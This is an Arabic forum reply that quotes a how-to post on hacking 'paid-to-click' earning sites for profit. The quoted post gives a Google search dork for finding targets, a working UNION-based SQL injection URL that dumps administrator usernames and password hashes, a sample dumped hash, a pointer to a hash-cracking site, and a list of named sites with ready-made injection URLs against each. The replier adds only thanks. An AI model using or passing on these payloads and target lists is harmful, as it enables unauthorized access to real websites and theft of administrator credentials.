عرض مشاركة واحدة
قديم 10-05-2013, 06:54 PM   رقم المشاركة : 27 (permalink)
معلومات العضو
siska93
 
الصورة الرمزية siska93
 

 

 
إحصائية العضو







siska93 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
siska93 is on a distinguished road

افتراضي رد: شرح مبسط لثغرة في مواقع ربح الاموال (اخترق و اربح بدون حدود) لوول


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Zero
[align=center]بسم الله الرحمن الرحيم
الحمدلله والصلاة والسلام على رسول الله وعلى آله وصحبه أجمعين

لابد انك من قرائتك للعنوان عرفت عن مادا سنتحدت ادن بدون اطالة ندخل للموضوع

ندهب الى موقع البحت قوقل

www.google.co.ma

ناخد الدورك التالي

كود PHP:
inurl:"main_forum.php?cat=" 
و نحطه في مكان البحث

نلاحض المواقع الكتيرة وكلها تنتهي ب bux دا دليل على انها مواقع ربح

ناخد موقع من النتائج
انا اخترت موقع Alexaclick و نضيف ليه الاستغلال
ليصبح هكدا

كود PHP:
http://www.alexaclix.com/forum/main_forum.php?cat=-22+Union+ALL+Select+1,group_concat%28aId,0x3a,aUsername,0x3a,apassword%29,3,4,5,6,7+FROM+admins-- 
الاستغلال

كود PHP:
forum/main_forum.php?cat=-22+Union+ALL+Select+1,group_concat(aId,0x3a,aUsername,0x3a,apassword),3,4,5,6,7+FROM+admins-- 
فيعطينا النتيجة التالية
الي هي الباس و ايزر

كود PHP:
admin:d6ae89521827cb719f8cf42cdf6e79e0f26a01e3 
بس الباس هنا مشفر

لدي الحل

موقع مضمون

www.passcracking.com

ندخل للموقع دا ونضع الشفرة في المكان المخصص
ونضغط على DoIT

و نشوف التيجة ان شاء الله خير

كدا انتهينا من الشرح

و الان بعض المواقع المصابة

كود PHP:
http://www.alexaclix.com/forum/main_forum.php?cat=-22+Union+ALL+Select+1,group_concat%28aId,0x3a,aUsername,0x3a,apassword%29,3,4,5,6,7+FROM+admins--

gen3bux.com/forum/main_forum.php?cat=-22+Union+ALL+Select+1,group_concat(aId,0x3a,aUsername,0x3a,apassword),3,4,5,6,7+FROM+admins--  

bpbux.info/forum/main_forum.php?cat=-22+Union+ALL+Select+1,group_concat(aId,0x3a,aUsername,0x3a,apassword),3,4,5,6,7+FROM+admins-- 
[/align]

thnx

   

رد مع اقتباس